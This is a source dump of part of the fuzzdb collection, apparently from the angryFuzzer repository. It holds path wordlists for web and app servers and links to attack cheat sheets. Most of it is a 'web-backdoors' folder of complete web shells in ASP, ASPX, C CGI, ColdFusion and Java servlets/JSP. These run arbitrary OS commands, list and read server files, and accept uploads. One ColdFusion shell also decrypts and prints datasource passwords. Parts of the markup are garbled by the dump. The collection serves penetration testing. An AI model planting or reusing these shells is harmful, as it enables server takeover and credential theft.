| vendor/assets/stylesheets 105 | vendor/assets/stylesheets/.gitkeep 106 | vendor/plugins 107 | vendor/plugins/.gitkeep 108 | app/views/home/index.html.erb 109 | assets/application.css 110 | assets/jquery.js 111 | assets/application.js 112 | assets/home.css 113 | assets/home.js 114 | posts 115 | posts/new 116 | posts/1/edit 117 | posts.json 118 | javascripts/application.js 119 | javascripts/prototype.js 120 | stylesheets/application.css 121 | images/rails.png 122 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/SiteMinder.txt: -------------------------------------------------------------------------------- 1 | /iam/ 2 | /iam/siteminder/ 3 | /sitemindermonitor/ 4 | /sitemindermonitor/doConfig.jsp 5 | /sitemindermonitor/doSave.jsp 6 | /sitemindermonitor/readfile.jsp 7 | /siteminder/ 8 | /siteminder/monitor/ 9 | /siteminder/monitor/settings 10 | /doConfig.jsp 11 | /doSave.jsp 12 | /readfile.jsp 13 | /siteminderagent/ 14 | /siteminderagent/pwcgi/ 15 | /siteminderagent/pwcgi/smpwservicescgi.exe 16 | /auth/ 17 | /servlet/ 18 | /servlet/DateServlet 19 | /servlet/TestServlet 20 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/SunAppServerGlassfish.txt: -------------------------------------------------------------------------------- 1 | /BasicAuthServlet 2 | /CertAuthServlet 3 | /cgi-bin 4 | /cgi-bin/gx.cgi 5 | /cgi-bin/gx.dll 6 | /cgi-bin/gx.exe 7 | /classes 8 | /com.netscape.server.servlet.jsp.JSPRunner 9 | /COnlineBank 10 | /CSample 11 | /ExceptionThrown.jsp 12 | /FormAuthServlet 13 | /fortune 14 | /gx 15 | /GXApp 16 | /GXApp/COnlineBank 17 | /GXApp/COnlineBank/COBLogin.html 18 | /GXApp/CSample 19 | /GXApp/CSample/index.html 20 | /GXApp/images 21 | /GXApp/index.html 22 | /GXApp/OnlineBank 23 | /GXApp/OnlineBank/OBLogin.html 24 | /gx.cgi 25 | /gx.exe 26 | /ias-samples 27 | /ias-samples/index.html 28 | /index.html 29 | /JSPRunner 30 | /JSPRunnerSticky 31 | /lotery 32 | /NASApp 33 | /NASApp/fortune/fortune 34 | /NASApp/system 35 | /NASApp/system/BasicAuthServlet 36 | /NASApp/system/CertAuthServlet 37 | /NASApp/system/ExceptionThrown.jsp 38 | /NASApp/system/FormAuthServlet 39 | /NASApp/system/JSPRunner 40 | /NASApp/system/JSPRunnerSticky 41 | /NASApp/system/SessionInvalidator 42 | /NASApp/system/StaticServlet 43 | /NASApp/system/ValidationError.jsp 44 | /NASApp/system/WelcomeListServlet 45 | /OnlineBank 46 | /servlet 47 | /SessionInvalidator 48 | /StaticServlet 49 | /system 50 | /ValidationError.jsp 51 | /WelcomeListServlet 52 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/SuniPlanet.txt: -------------------------------------------------------------------------------- 1 | ?Publisher 2 | ?wp-cs-dump 3 | ?wp-html-rend 4 | ?wp-start-ver 5 | ?wp-stop-ver 6 | ?wp-uncheckout 7 | ?wp-usr-prop 8 | ?wp-ver-diff 9 | ?wp-ver-info 10 | ?wp-verify-link 11 | admin-serv 12 | admin-serv/config/admpw 13 | admpw 14 | agents 15 | bin 16 | ca 17 | cgi-bin 18 | config 19 | dirb_random.cgi 20 | dirb_random.jsp 21 | dirb_random.shtml 22 | docs 23 | dsgw 24 | help 25 | index.html 26 | jsp 27 | manual 28 | mc-icons 29 | netshare 30 | ns-icons 31 | publisher 32 | search 33 | search-ui 34 | servlet 35 | servlets 36 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/Vignette.txt: -------------------------------------------------------------------------------- 1 | /0,,,00 2 | /0,,,00.html 3 | /1,,,00 4 | /1,,,00.html 5 | /CDA 6 | /CDS 7 | /CMA 8 | /CMS 9 | /Deleting 10 | /Docs 11 | /Editing 12 | /HOME 13 | /Images 14 | /Internal 15 | /MetaDataUpdate 16 | /Report 17 | /Select 18 | /StoryServer 19 | /TMT 20 | /VGN 21 | /XML 22 | /ac 23 | /allvars 24 | /asp 25 | /aspstatus 26 | /cda 27 | /cds 28 | /cma 29 | /cms 30 | /controller 31 | /diag 32 | /docs 33 | /edit 34 | /error 35 | /errorpage 36 | /errors 37 | /executequery 38 | /external 39 | /home 40 | /ibm 41 | /initialize 42 | /internal 43 | /jsp 44 | /jspstatus 45 | /jsptest 46 | /legacy 47 | /license 48 | /listcolumns 49 | /login 50 | /loginlogo 51 | /logo 52 | /main 53 | /menu 54 | /metadataupdate 55 | /performance 56 | /portal 57 | /ppstats 58 | /preview 59 | /previewer 60 | /record 61 | /reset 62 | /save 63 | /stat 64 | /status 65 | /storyserver 66 | /style 67 | /stylepreviewer 68 | /utils 69 | /vdc 70 | /vgn 71 | /vr 72 | /Ping.jsp 73 | /HelloWorld.jsp 74 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/wellknown-rfc5785.txt: -------------------------------------------------------------------------------- 1 | .well-known/ 2 | .well-known/acme-challenge 3 | .well-known/apple-app-site-association 4 | .well-known/apple-developer-merchant-domain-association 5 | .well-known/ashrae 6 | .well-known/assetlinks.json 7 | .well-known/browserid 8 | .well-known/caldav 9 | .well-known/carddav 10 | .well-known/core 11 | .well-known/csvm 12 | .well-known/dnt 13 | .well-known/dnt-policy.txt 14 | .well-known/est 15 | .well-known/genid 16 | .well-known/hoba 17 | .well-known/host-meta 18 | .well-known/host-meta.json 19 | .well-known/keybase.txt 20 | .well-known/ni 21 | .well-known/openid-configuration 22 | .well-known/openorg 23 | .well-known/posh 24 | .well-known/reload-config 25 | .well-known/repute-template 26 | .well-known/stun-key 27 | .well-known/time 28 | .well-known/timezone 29 | .well-known/void 30 | .well-known/webfinger 31 | -------------------------------------------------------------------------------- /fuzzdb/docs/attack-docs/remote-cmd-exfiltration/Web-Shells-rev2.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/docs/attack-docs/remote-cmd-exfiltration/Web-Shells-rev2.pdf -------------------------------------------------------------------------------- /fuzzdb/docs/attack-docs/remote-cmd-exfiltration/netcat_cheat_sheet_v1.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/docs/attack-docs/remote-cmd-exfiltration/netcat_cheat_sheet_v1.pdf -------------------------------------------------------------------------------- /fuzzdb/docs/attack-docs/remote-cmd-exfiltration/windows_command_line_sheet_v1.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/docs/attack-docs/remote-cmd-exfiltration/windows_command_line_sheet_v1.pdf -------------------------------------------------------------------------------- /fuzzdb/docs/attack-docs/source-directory-file-indexing-cheatsheet.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/docs/attack-docs/source-directory-file-indexing-cheatsheet.html -------------------------------------------------------------------------------- /fuzzdb/docs/attack-docs/sqli/docs.oracle_cheat.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/docs/attack-docs/sqli/docs.oracle_cheat.pdf -------------------------------------------------------------------------------- /fuzzdb/docs/attack-docs/xss/docs.wasc-scriptmapping/images/ff2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/docs/attack-docs/xss/docs.wasc-scriptmapping/images/ff2.png -------------------------------------------------------------------------------- /fuzzdb/docs/attack-docs/xss/docs.wasc-scriptmapping/images/ie7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/docs/attack-docs/xss/docs.wasc-scriptmapping/images/ie7.png -------------------------------------------------------------------------------- /fuzzdb/docs/attack-docs/xss/docs.wasc-scriptmapping/images/safari3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/docs/attack-docs/xss/docs.wasc-scriptmapping/images/safari3.png -------------------------------------------------------------------------------- /fuzzdb/docs/misc/Web-Shells-rev2.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/docs/misc/Web-Shells-rev2.pdf -------------------------------------------------------------------------------- /fuzzdb/docs/misc/Wireshark_Display_Filters.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/docs/misc/Wireshark_Display_Filters.pdf -------------------------------------------------------------------------------- /fuzzdb/regex/README.md: -------------------------------------------------------------------------------- 1 | lists of error messages for regex matching: 2 | Search all output pages generated by fuzzing payloads for the extensive list of known error strings, for later analysis. 3 | usage docs: 4 | https://github.com/fuzzdb-project/fuzzdb/wiki/regexerrors 5 | 6 | breakpoint-ignores.txt 7 | List of common URLS which can be annoying while in a web proxy's breakpoint mode. 8 | -------------------------------------------------------------------------------- /fuzzdb/regex/amazon.txt: -------------------------------------------------------------------------------- 1 | (? "") Then 15 | szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" & oFSys.GetTempName() 16 | ' Here we do the command 17 | Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF & 18 | """",0,True) 19 | response.write szTF 20 | ' Change perms 21 | Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G 22 | everyone:F",0,True) 23 | Set oF = oFSys.OpenTextFile(szTF,1,False,0) 24 | End If 25 | %> 26 |
" method="POST"> 27 | 28 | 
29 | Machine: <%=oSNet.ComputerName%>

30 | Username: <%=oSNet.UserName%>

31 | <% 
32 | If (IsObject(oF)) Then
33 |   On Error Resume Next
34 |   Response.Write Server.HTMLEncode(oF.ReadAll)
35 |   oF.Close
36 |   Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)
37 | End If 
38 | 
39 | %>
40 | 
41 | 
42 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/asp/cmd.asp:
--------------------------------------------------------------------------------
 1 | 
11 | 
12 | <%
13 | Set oScript = Server.CreateObject("WSCRIPT.SHELL")
14 | Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
15 | Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
16 | 
17 | szCMD = request("cmd")
18 | 
19 | If (szCMD <> "") Then
20 |   szTempFile = "C:\" & oFileSys.GetTempName( )
21 |   Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
22 |   Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
23 |   End If
24 | %>
25 | 
26 | 
27 | 
28 | 

29 | 
30 | 
31 | 

32 | 
33 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
34 | 

35 | <%
36 |   If (IsObject(oFile)) Then
37 |     On Error Resume Next
38 |     Response.Write Server.HTMLEncode(oFile.ReadAll)
39 |     oFile.Close
40 |     Call oFileSys.DeleteFile(szTempFile, True)
41 |   End If
42 | %>
43 | 
44 | 
45 | 
46 | 
47 | 
48 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/asp/cmd.aspx:
--------------------------------------------------------------------------------
 1 | <%@ Page Language="VB" Debug="true" %>
 2 | <%@ import Namespace="system.IO" %>
 3 | <%@ import Namespace="System.Diagnostics" %>
 4 | 
 5 | 
25 | 
26 | 
27 |     
28 | 
        
29 | 
Program        
30 | c:\windows\system32\cmd.exe        
31 | 
Arguments        
32 | /c net user        
33 | 
        
34 | 
       
35 | 

36 | 
37 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/asp/cmdasp.asp:
--------------------------------------------------------------------------------
 1 | <%@ Language=VBScript %>
 2 | <%
 3 |   ' --------------------o0o--------------------
 4 |   '  File:    CmdAsp.asp
 5 |   '  Author:  Maceo 
 6 |   '  Release: 2000-12-01
 7 |   '  OS:      Windows 2000, 4.0 NT
 8 |   ' -------------------------------------------
 9 | 
10 |   Dim oScript
11 |   Dim oScriptNet
12 |   Dim oFileSys, oFile
13 |   Dim szCMD, szTempFile
14 | 
15 |   On Error Resume Next
16 | 
17 |   ' -- create the COM objects that we will be using -- '
18 |   Set oScript = Server.CreateObject("WSCRIPT.SHELL")
19 |   Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
20 |   Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
21 | 
22 |   ' -- check for a command that we have posted -- '
23 |   szCMD = Request.Form(".CMD")
24 |   If (szCMD <> "") Then
25 | 
26 |     ' -- Use a poor man's pipe ... a temp file -- '
27 |     szTempFile = "C:\" & oFileSys.GetTempName( )
28 |     Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
29 |     Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
30 | 
31 |   End If
32 | 
33 | %>
34 | 
35 | 
36 | 
" method="POST">
37 | 
38 | 
39 | 

40 | 
41 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
42 | 

43 | <%
44 |   If (IsObject(oFile)) Then
45 |     ' -- Read the output from our command and remove the temp file -- '
46 |     On Error Resume Next
47 |     Response.Write Server.HTMLEncode(oFile.ReadAll)
48 |     oFile.Close
49 |     Call oFileSys.DeleteFile(szTempFile, True)
50 |   End If
51 | %>
52 | 
53 | 
54 | 
55 | 
56 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/asp/cmdasp.aspx:
--------------------------------------------------------------------------------
 1 | <%@ Page Language="C#" Debug="true" Trace="false" %>
 2 | <%@ Import Namespace="System.Diagnostics" %>
 3 | <%@ Import Namespace="System.IO" %>
 4 | 
28 | 
29 | 
30 | awen asp.net webshell
31 | 
32 | 
33 | 

34 | 
35 | 
36 | Command:
37 | 

38 | 
39 | 
40 | 
41 | 
42 | 
43 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/asp/list.asp:
--------------------------------------------------------------------------------
 1 | 
11 | 
12 | 
13 | 
14 | 
15 | <%
16 | 
17 | file=request("file")
18 | tipo=request("type")
19 | 
20 | If file="" then
21 | 	file="c:\"
22 | 	tipo="1"
23 | End If
24 | 
25 | %>
26 | 
27 | 
28 | 

29 | 
30 | 
31 | 
32 | 

33 | 
34 | 
35 | <%
36 | 
37 | If tipo="1" then
38 |     Response.Write("
PATH: " & file & "
")
39 | 	ListFolder(file)
40 | End If
41 | 
42 | If tipo="2" then
43 |     Response.Write("
FILE: " & file & "
")
44 | 
45 |     Set oStr = server.CreateObject("Scripting.FileSystemObject")
46 |     Set oFich = oStr.OpenTextFile(file, 1)
47 | 
48 | 	Response.Write("
--
")
49 | 
50 |     Response.Write(oFich.ReadAll)
51 | 
52 |     Response.Write("
--
")
53 | 
54 | End If
55 | %>
56 | 
57 | <%
58 | 
59 | sub ListFolder(path)
60 | 
61 | 	set fs = CreateObject("Scripting.FileSystemObject")
62 | 	set folder = fs.GetFolder(path)
63 | 
64 | 	Response.Write("
( ) " & ".." & "" & vbCrLf)
65 | 
66 | 	for each item in folder.SubFolders
67 | 		Response.Write("
( ) " & item.Name & "" & vbCrLf)
68 | 	next
69 | 
70 | 	for each item in folder.Files
71 | 		Response.Write("
  • " & item.Name & " - " & item.Size & " bytes, " & "
    • " & vbCrLf)
72 | 	next
73 | 
74 | end sub
75 | 
76 | %>
77 | 
78 | 
79 | 
80 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/asp/list.txt:
--------------------------------------------------------------------------------
 1 | 
11 | 
12 | 
13 | 
14 | 
15 | <%
16 | 
17 | file=request("file")
18 | tipo=request("type")
19 | 
20 | If file="" then
21 | 	file="c:\"
22 | 	tipo="1"
23 | End If
24 | 
25 | %>
26 | 
27 | 
28 | 
    
29 | 
30 | 
31 | 
32 | 
    
33 | 
34 | 
35 | <%
36 | 
37 | If tipo="1" then
38 |     Response.Write("
    PATH: " & file & "
    ")
39 | 	ListFolder(file)
40 | End If
41 | 
42 | If tipo="2" then
43 |     Response.Write("
    FILE: " & file & "
    ")
44 | 
45 |     Set oStr = server.CreateObject("Scripting.FileSystemObject")
46 |     Set oFich = oStr.OpenTextFile(file, 1)
47 | 
48 | 	Response.Write("
    --
    ")
49 | 
50 |     Response.Write(oFich.ReadAll)
51 | 
52 |     Response.Write("
    --
    ")
53 | 
54 | End If
55 | %>
56 | 
57 | <%
58 | 
59 | sub ListFolder(path)
60 | 
61 | 	set fs = CreateObject("Scripting.FileSystemObject")
62 | 	set folder = fs.GetFolder(path)
63 | 
64 | 	Response.Write("
    ( ) " & ".." & "" & vbCrLf)
65 | 
66 | 	for each item in folder.SubFolders
67 | 		Response.Write("
    ( ) " & item.Name & "" & vbCrLf)
68 | 	next
69 | 
70 | 	for each item in folder.Files
71 | 		Response.Write("
  • " & item.Name & " - " & item.Size & " bytes, " & "
    • " & vbCrLf)
72 | 	next
73 | 
74 | end sub
75 | 
76 | %>
77 | 
78 | 
79 | 
80 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/asp/ntdaddy.asp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/web-backdoors/asp/ntdaddy.asp


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/c/cmd.c:
--------------------------------------------------------------------------------
 1 | //
 2 | // cmdcgi.exe 0.1 darkraver (12/05/2005)
 3 | //
 4 | 
 5 | #include 
 6 | 
 7 | 
 8 | char *uri_decode(char *uri) {
 9 |   int i=0;
10 |   int ptr=0;
11 |   char *command;
12 |   char hexa[3];
13 |   char code;
14 | 
15 |   command=(char *)malloc(strlen(uri));
16 | 
17 |   for(i=0;i\n");
53 | 
54 |   cmd=(char *)getenv("QUERY_STRING");
55 | 
56 |   if(!cmd || strlen(cmd)==0) {
57 |     printf("
    ");
58 |     printf("");
59 |     printf("");
60 |     printf("

    ");
61 |     } else {
62 |     //printf("QUERY_STRING: %s\n", cmd);
63 |     cmd+=4;
64 |     cmd=uri_decode(cmd);
65 |     printf("
    COMMAND: %s

    \n", cmd);
66 |     fflush(stdout);
67 |     execl("/bin/sh", "/bin/sh", "-c", cmd, 0);
68 |     }
69 | 
70 | }
71 | 
72 | 
73 | 
74 | 
75 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/cfm/cfExec.cfm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | 
 5 | 
 6 | Notes:
    
 7 | 
      
 8 | 
    • For Windows put this as command "c:\windows\system32\cmd.exe /c" or wherever cmd.exe is
      
 9 | 
    • For Windows options are the command you want to run "dir" "type" etc
10 | 
    
11 | 
    
12 | 
13 | 
14 | 
15 | 
16 | 
18 | 
20 | 
23 | 
    Command:value="#form.cmd#">
    Options: value="#form.opts#">
    Timeout: value="#form.timeout#"
22 |   value="5">
    
24 | 
25 | 
26 | 
27 | 
28 | 
29 | 
32 | 
33 | 
34 | 
    35 | #HTMLCodeFormat(myVar)#
36 | 
    
37 | 
38 | 
39 | 
40 | //The following code borrowed from hernanOchoa @hexale (thx)  
41 | //added better formatting on output and connection string [lb]
42 | 
43 | // Create Data Source Object
44 | dataSourceObb=createobject("java","coldfusion.server.ServiceFactory").
45 | 	getDatasourceService().getDatasources();
46 | 	writeoutput("

    Datasource Credentials:
    ");
47 | 	writeoutput("");
48 | // Loop Through DataSources
49 | for(i in dataSourceObb) {
50 | 	if(len(dataSourceObb[i]["password"])){
51 | 
52 | 	// Get url
53 | 	theurl=(dataSourceObb[i]["url"]);
54 | 
55 | 	// Get username
56 | 	username=(dataSourceObb[i]["username"]);
57 | 
58 | 	// Get and decrypt password
59 | 	decryptPassword=Decrypt(dataSourceObb[i]["password"],
60 | 	generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"), "DESede",
61 |      "Base64");
62 | 	 
63 | 	// Output datasource usernames, passwords, and urls
64 | 	writeoutput("" & 
65 | 	"" & 
66 | 	"" & 
67 | 	"");
69 | 	}
70 | }
71 | writeoutput("
    DataSource: " & i & "Username: " & username & "Password: " & decryptPassword & 
68 | 	"URL: " & theurl & "

    ");
72 |     
73 | 
74 | 
75 | 
76 | 
77 |  


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/cfm/cfSQL.cfm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | 
 5 | 
 6 | 
 7 | 
 8 | 
 9 | 
    Notes:
    
10 | 
      
11 | 
    • Select the database you want to use
      • 
12 | 
    • Write SQL statements in the text box
      • 
13 | 
    
14 | 
15 | 
    
16 | 
    SQL Interface:
    
17 | Datasource
    
18 | 
27 | 
28 | 
    
29 | SQL
    
30 | 
31 | 
    
32 | 
33 | 
    
34 | 
35 | 
36 | 
37 | 	#Form.sql#
38 | 
39 | 
40 | 
41 | 
42 |     
43 |     
44 |         
45 |                 
46 |                         
47 |                                   
48 |                         
49 |                 
50 |         
51 |                 
52 |                         
53 |                                 
54 |                         
55 |                 
56 |         
57 |     
58 |     
59 | 
    #column#
    #runsql[column][row]#
    
60 | 
61 | 
62 | 
63 | 
64 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/cfm/cmd.cfm:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | 
 5 | 
 6 | 
 7 |  
 8 |   
 9 |   
10 |  
11 |  
12 |   
13 |   
14 |  
15 |  
16 |   
17 |   
18 |  
19 | 
    Command: < input type=text name="cmd" size=50 value="#form.cmd#" > < br>
    Options: < input type=text name="opts" size=50  value="#form.opts#"  >< br> 
    Timeout:< input type=text name="timeout" size=4  value="#form.timeout#"  value="5"  > 
    
20 | 
21 | 
22 | 
23 | 
24 | 
25 | 
26 | 
27 | 
    28 | #myVar#
29 | 
    
30 |     
31 | 
32 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/exe/nc.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/web-backdoors/exe/nc.exe


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/jsp/CmdServlet.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/web-backdoors/jsp/CmdServlet.class


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/jsp/CmdServlet.java:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * CmdServlet.java	20/01/2004
 3 |  *
 4 |  * @author The Dark Raver
 5 |  * @version 0.1
 6 |  */
 7 | 
 8 | import java.io.*;
 9 | import javax.servlet.*;
10 | import javax.servlet.http.*;
11 | 
12 | 
13 | public class CmdServlet extends HttpServlet {
14 | 
15 |     public void doGet(HttpServletRequest req, HttpServletResponse res)	throws ServletException, IOException {
16 | 		res.setContentType("text/html");
17 | 
18 | 		PrintWriter out = res.getWriter();
19 | 		out.print("");
20 | 		out.print("
    ");
21 | 		out.print("");
22 | 		out.print("");
23 | 		out.print("
    ");
24 | 
25 | 		if(req.getParameter("cmd") != null) {
26 | 	        out.print("\n
    Command: " + req.getParameter("cmd") + "\n

    \n");
27 | 	        Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
28 | 	        DataInputStream procIn = new DataInputStream(p.getInputStream());
29 | 			int c='\0';
30 |         	while ((c=procIn.read()) != -1) {
31 | 				out.print((char)c);
32 | 				}
33 | 	        }
34 | 
35 | 		out.print("\n
    ");
36 | 		out.print("");
37 |     }
38 | 
39 |     public String getServletInfo() {
40 | 		return "CmdServlet 0.1";
41 |     }
42 | 
43 | }
44 | 


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/jsp/ListServlet.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/web-backdoors/jsp/ListServlet.class


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/jsp/ListServlet.java:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * ListServlet.java
 3 |  *
 4 |  * @author Sierra
 5 |  * @version 0.1
 6 |  */
 7 | 
 8 | import java.io.*;
 9 | import javax.servlet.ServletException;
10 | import javax.servlet.http.*;
11 | 
12 | public class ListServlet extends HttpServlet
13 | {
14 | 
15 | 
16 |     public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
17 |         PrintWriter printwriter = res.getWriter();
18 | 		String path = req.getParameter("file");
19 | 
20 | 		printwriter.write("\n\nDirectory Listing\n\n\n");
21 | 		printwriter.write("\n");
22 | 		if(req.getParameter("file")==null) path = "c:\\";
23 | 		printwriter.write("

    Path: " + path + "

    \n");
24 | 
25 | 		File file = new File(path);
26 | 
27 | 		if(file.isDirectory())
28 | 		{
29 | 			String s = new String("Unknown");
30 | 			String s2 = new String("Black");
31 | 			File afile[] = file.listFiles();
32 | 			for(int i = 0; i < afile.length; i++)
33 | 			{
34 | 				String s1 = new String(afile[i].toString());
35 | 				printwriter.write("(");
36 | 				String s3;
37 | 				if(afile[i].isDirectory())
38 | 				{
39 | 					printwriter.write("d");
40 | 					s1 = s1 + "/";
41 | 					s3 = new String("Blue");
42 | 				} else
43 | 				if(afile[i].isFile())
44 | 				{
45 | 					printwriter.write("-");
46 | 					s3 = new String("Green");
47 | 				} else
48 | 				{
49 | 					printwriter.write("?");
50 | 					s3 = new String("Red");
51 | 				}
52 | 				if(afile[i].canRead())
53 | 					printwriter.write("r");
54 | 				else
55 | 					printwriter.write("-");
56 | 				if(afile[i].canWrite())
57 | 					printwriter.write("w");
58 | 				else
59 | 					printwriter.write("-");
60 | 				printwriter.write(") " + s1.toString() + " " + "( Size: " + afile[i].length() + " bytes )
    \n");
61 | 			}
62 | 
63 | 			printwriter.write("
    ");
64 | 		} else
65 | 		if(file.canRead())
66 | 		{
67 | 			FileInputStream fileinputstream = new FileInputStream(file);
68 | 			int j = 0;
69 | 				while(j >= 0)
70 | 				{
71 | 					j = fileinputstream.read();
72 | 					printwriter.write(j);
73 | 				}
74 | 			fileinputstream.close();
75 | 		} else
76 | 		{
77 | 			printwriter.write("Can't Read file
    ");
78 | 		}
79 | 
80 |     }
81 | 
82 | 
83 |     public String getServletInfo() {
84 |         return "Directory Listing";
85 |     }
86 | }


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/jsp/UpServlet.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/web-backdoors/jsp/UpServlet.class


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/jsp/UpServlet.java:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * UpServlet.java	29/04/2005
 3 |  *
 4 |  * @author The Dark Raver
 5 |  * @version 0.1
 6 |  */
 7 | 
 8 | import java.io.*;
 9 | import javax.servlet.*;
10 | import javax.servlet.http.*;
11 | 
12 | 
13 | public class UpServlet extends HttpServlet {
14 | 
15 |     public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
16 | 		res.setContentType("text/html");
17 | 		PrintWriter out = res.getWriter();
18 | 		out.print("");
19 | 		out.print("
    ");
20 | 		out.print("UPLOAD ");
21 | 		out.print("");
22 | 		out.print("
    ");
23 | 		out.print("");
24 | 	}
25 | 
26 | 
27 |     public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
28 | 		String tag = new String();
29 | 		int c = '\0';
30 | 		int contador = 0;
31 | 		ServletInputStream in = req.getInputStream();
32 |         DataInputStream post = new DataInputStream(in);
33 | 
34 | 		PrintWriter out = res.getWriter();
35 | 		res.setContentType("text/html");
36 | 		out.print("
    ");
37 | 
38 | 		while((c=post.read()) != -1 && c != '\r' && c != '\n') {
39 | 			tag=tag.concat("" + (char)c);
40 | 			contador++;
41 | 			}
42 | 
43 | 		for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
44 | 
45 | 		// out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
46 | 		// out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
47 | 
48 | 		// (!) Uploaded File Name
49 | 
50 | 		File newfile = new File("c:\\install.log");
51 | 
52 | 		/////////////////////////
53 | 
54 | 		FileOutputStream fileout = new FileOutputStream(newfile);
55 | 
56 | 		for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
57 | 			c=post.read();
58 | 			fileout.write((char)c);
59 | 			}
60 | 
61 | 		fileout.close();
62 | 		out.print("<== OK");
63 | 
64 |     }
65 | 
66 | 
67 |     public String getServletInfo() {
68 | 		return "UpServlet 0.1";
69 |     }
70 | 
71 | }


--------------------------------------------------------------------------------
/fuzzdb/web-backdoors/jsp/cmd.jsp:
--------------------------------------------------------------------------------
 1 | <%@ page import="java.util.*,java.io.*"%>
 2 | <%
 3 | //
 4 | // JSP_KIT
 5 | //
 6 | // cmd.jsp = Command Execution (unix)
 7 | //
 8 | // by: Unknown
 9 | // modified: 27/06/2003
10 | //
11 | %>
12 | 
13 | 
    
14 | 
